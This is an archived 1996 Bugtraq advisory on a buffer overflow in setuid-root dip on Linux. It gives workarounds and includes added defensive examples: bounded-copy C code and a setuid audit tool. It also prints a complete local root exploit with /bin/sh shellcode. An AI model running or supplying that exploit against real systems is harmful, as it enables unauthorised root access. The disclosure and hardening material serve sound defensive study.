Bugtraq mailing list archives
Linux: dip security hole
From: djw () ccwf cc utexas edu (Dan Walters)
Date: Sun, 21 Jan 1996 14:34:22 -0600
PROGRAM: dip 3.3.7n, and probably other variants
AFFECTED SYSTEMS: Linux - Slackware 3.0 and RedHat 2.1 verified, others unknown.
IMPACT: Local users can get superuser privileges.
SYNOPSIS: Some Linux distributions come with dip setuid root by default. There are multiple points in dip where an unbounded buffer is used with user-supplied data, making a stack overflow possible. Functions in which this appears to be possible include do_chatkey() and mdm_dial().
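The unbounded-copy pattern the synopsis describes, as an added illustration that is not dip's own code: a hypothetical chatkey handler that copies the argument of a script line into a fixed 128-byte stack buffer with strcpy(), beside a bounded version that refuses anything that does not fit. The function names, KEYBUF, the "chatkey <argument>" line format and the sample lines are assumptions made for this example.

```c
/* Added example, not dip's own code: the pattern the advisory describes
 * (user-supplied script data copied into a fixed stack buffer without a
 * bound) next to a bounded version. All names here are hypothetical. */
#include <stdio.h>
#include <string.h>

#define KEYBUF 128   /* assumed size of the fixed stack buffer */

/* Vulnerable pattern: strcpy() stops only at the NUL in the argument, so
 * an argument of KEYBUF bytes or more runs past `key` into the saved
 * frame pointer and return address on the stack. Kept for contrast;
 * never call it with untrusted input. */
int chatkey_unbounded(const char *arg)
{
    char key[KEYBUF];
    strcpy(key, arg);                   /* no bound checked against sizeof key */
    return (int)strlen(key);
}

/* Hardened version: the caller passes the argument length, the function
 * refuses anything that does not fit together with its terminator, and
 * the copy itself is bounded. Returns the copied length or -1. */
int chatkey_bounded(const char *arg, size_t len)
{
    char key[KEYBUF];
    if (len >= sizeof key)
        return -1;                      /* reject rather than truncate silently */
    memcpy(key, arg, len);
    key[len] = '\0';
    return (int)len;
}

/* Parse one script line of the form "chatkey <argument>\n". Returns the
 * argument length, -1 if it is too long, -2 if this is not a chatkey line. */
int parse_chat_line(const char *line)
{
    static const char kw[] = "chatkey ";
    size_t kwlen = sizeof kw - 1;
    if (strncmp(line, kw, kwlen) != 0)
        return -2;
    const char *arg = line + kwlen;
    size_t len = strcspn(arg, "\n");    /* argument ends at newline or NUL */
    return chatkey_bounded(arg, len);
}

int main(void)
{
    /* constructed sample lines: one that fits and one that would have
     * overflowed the unbounded version */
    char big[700];
    memcpy(big, "chatkey ", 8);
    memset(big + 8, 'A', 600);
    big[608] = '\n';
    big[609] = '\0';
    printf("short line -> %d\n", parse_chat_line("chatkey ATDT\n"));  /* 4 */
    printf("long line  -> %d\n", parse_chat_line(big));               /* -1 */
    return 0;
}
```

The point of the bounded version is that the length check happens against the destination's size before any byte is written, and that an oversize argument is an error the caller can report rather than something that is silently cut off.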
WORKAROUND: It is suggested that, at least until the source has been further scrutinized, dip not be setuid unless necessary:
chmod 0755 dip
If you must have dip setuid, place it in a group where it can only be executed by trusted users.
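The two workarounds above as an added example, not part of the advisory: a small C audit that checks whether a binary is setuid, owned by root and executable by everyone, and derives the mode for each option. The 0755 value comes from the advisory; realizing the "trusted group" option as chgrp plus mode 4750 is this example's assumption, as are the helper names and the default path argument.

```c
/* Added example (not from the advisory): audit a binary's mode and
 * derive the two workaround modes the advisory suggests. */
#include <stdio.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

/* True when a file is setuid, owned by root, and executable by anyone:
 * the configuration the advisory warns about. */
int setuid_root_world_exec(mode_t mode, uid_t owner)
{
    return (mode & S_ISUID) && owner == 0 && (mode & S_IXOTH);
}

/* Workaround 1: drop the setuid bit entirely (chmod 0755 dip). */
mode_t mode_without_setuid(mode_t mode)
{
    return mode & 07777 & ~S_ISUID;     /* permission bits only */
}

/* Workaround 2 (assumed realization): keep setuid but remove all access
 * for "other", so only the owner and a trusted group can run it
 * (chgrp <trusted> dip; chmod 4750 dip). */
mode_t mode_group_restricted(mode_t mode)
{
    mode_t m = mode & 07777;
    m |= S_ISUID;
    m &= ~(S_IROTH | S_IWOTH | S_IXOTH);
    return m;
}

/* Stat a path and report; returns 1 if risky, 0 if not, -1 on error. */
int audit_path(const char *path)
{
    struct stat st;
    if (stat(path, &st) != 0)
        return -1;
    int risky = setuid_root_world_exec(st.st_mode, st.st_uid);
    printf("%s: mode %04o uid %u -> %s\n", path,
           (unsigned)(st.st_mode & 07777), (unsigned)st.st_uid,
           risky ? "setuid root, world-executable" : "ok");
    if (risky)
        printf("  suggested: chmod %04o %s  (or chgrp <trusted> %s && chmod %04o %s)\n",
               (unsigned)mode_without_setuid(st.st_mode), path, path,
               (unsigned)mode_group_restricted(st.st_mode), path);
    return risky;
}

int main(int argc, char **argv)
{
    /* default path is the one the advisory's exploit targets */
    const char *path = argc > 1 ? argv[1] : "/usr/sbin/dip";
    return audit_path(path) < 0 ? 2 : 0;
}
```

Run it as `./audit /usr/sbin/dip` (or with any other path) to see whether the binary is in the warned-about state and which chmod would take it out of it; the same check can be applied to every setuid root binary on the system, not just dip.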
SAMPLE EXPLOIT:
/* dip-exploit.c - overruns the buffer in do_chatkey() to give a shell */
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>     /* strcpy, strlen */
#include <fcntl.h>
#include <sys/types.h>  /* u_char, u_long */
#include <sys/stat.h>
#define PATH_DIP "/usr/sbin/dip"
u_char shell[] = /* courtesy of avalon ;) */
"\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
"\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
"\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh";
/* i386 only: returns the current stack pointer via %eax */
u_long esp() { __asm__("movl %esp, %eax"); }
int main(void)
{
    u_char buf[1024];
    u_long addr;
    int i, f;
    strcpy(buf, "chatkey ");
    addr = esp() - 192;
    for (i=8; i<128+16; i+=4)
        *((u_long *) (buf+i)) = addr;
    for (i=128+16; i<512; i++)
        buf[i] = 0x90;
    for (i=0; i<strlen(shell); i++)
        buf[512+i] = shell[i];
    buf[512+i] = '\n';
    /* write the oversized "chatkey" line as a dip script and run dip on it */
    if ((f = open("temp.dip", O_WRONLY|O_TRUNC|O_CREAT, 0600)) < 0) {
        perror("temp.dip");
        exit(0);
    }
    write(f, buf, 512+i);
    close(f);
    execl(PATH_DIP, "dip", "temp.dip", (char *)0);
    return 0;
}
--------------------------------------------------------------------
Dan Walters
djw () mail utexas edu